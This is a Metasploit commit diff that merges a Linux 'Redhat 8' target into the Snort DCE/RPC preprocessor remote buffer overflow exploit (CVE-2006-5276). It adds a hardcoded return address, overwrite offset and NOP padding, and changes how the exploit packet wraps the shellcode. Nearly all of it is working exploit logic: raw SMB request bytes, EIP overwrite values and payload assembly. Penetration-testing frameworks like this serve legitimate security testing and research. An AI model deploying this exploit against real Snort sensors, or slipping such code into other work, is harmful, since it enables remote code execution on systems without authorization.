merged unstable-modules/exploits/incomplete/linux/ids/snortdcerpc.rb …

…with exploits/windows/ids/snort_dce_rpc.rb
rapid7 · Jun 5, 2012 · dc6b2f4 · dc6b2f4
1 parent b282901
commit dc6b2f4
Showing 1 changed file with 21 additions and 6 deletions.
diff --git a/...les/exploits/windows/ids/snort_dce_rpc.rb → modules/exploits/multi/ids/snort_dce_rpc.rb b/...les/exploits/windows/ids/snort_dce_rpc.rb → modules/exploits/multi/ids/snort_dce_rpc.rb
@@ -31,14 +31,18 @@ def initialize(info = {})
 			'Author'          =>
 				[
 					'Neel Mehta', #Original discovery (IBM X-Force)
-					'Carsten Maartmann-Moe <carsten[at]carmaa.com>'  #Metasploit
+					'Trirat Puttaraksa', #POC
+					'Carsten Maartmann-Moe <carsten[at]carmaa.com>',  #Metasploit win
+					'0a29406d9794e4f9b30b3c5d6702c708' #Metasploit linux
+
 				],
 			'License'         => MSF_LICENSE,
-			'Platform'        => 'win',
 			'References'      =>
 				[
 					[ 'OSVDB', '32094' ],
 					[ 'CVE', '2006-5276' ],
+					[ 'URL', 'http://web.archive.org/web/20070221235015/http://www.snort.org/docs/advisory-2007-02-19.html'],
+					[ 'URL', 'http://sf-freedom.blogspot.com/2007/02/snort-261-dcerpc-preprocessor-remote.html'],
 					[ 'URL', 'http://downloads.securityfocus.com/vulnerabilities/exploits/22616-linux.py']
 				],
 			'DefaultOptions'  =>
@@ -56,10 +60,21 @@ def initialize(info = {})
 					[
 						'Windows Universal',
 						{
+							'Platform' => 'win',
 							'Ret'    => 0x00407c01,  # JMP ESP snort.exe
-							'Offset' => 289          # The number of bytes before overwrite
+							'Offset' => 289,         # The number of bytes before overwrite
+							'Padding' => 0
 						}
 					],
+					[
+						'Redhat 8',
+						{	
+							'Platform' => 'linux',
+							'Ret' => 0xbffff110,
+							'Offset' => 317,
+							'Padding' => 28	
+						}
+					]
 				],
 			'Privileged'      => true,
 			'DisclosureDate'  => 'Feb 19 2007',
@@ -133,7 +148,6 @@ def buildpacket(shost, rhost, rport)
 		# Write AndX Request #2
 		header << "\x0e\xff\x00\xde\xde\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
 		header << "\x00\x48\x00\x00\x00\xff\x01"
-
 		tail = "\x00\x00\x00\x00\x49\x00\xee"
 
 		# Return address
@@ -150,9 +164,10 @@ def buildpacket(shost, rhost, rport)
 		requestsize = [(sploit.size() + target['Offset'])].pack('v')
 
 		# Assemble the parts into one package
-		p.payload = header << requestsize << tail << eip << sploit
+		p.payload = header << requestsize << tail << make_nops(target['Padding']) << eip << sploit	
+
 		p.recalc
 
 		p
 	end
-end
+end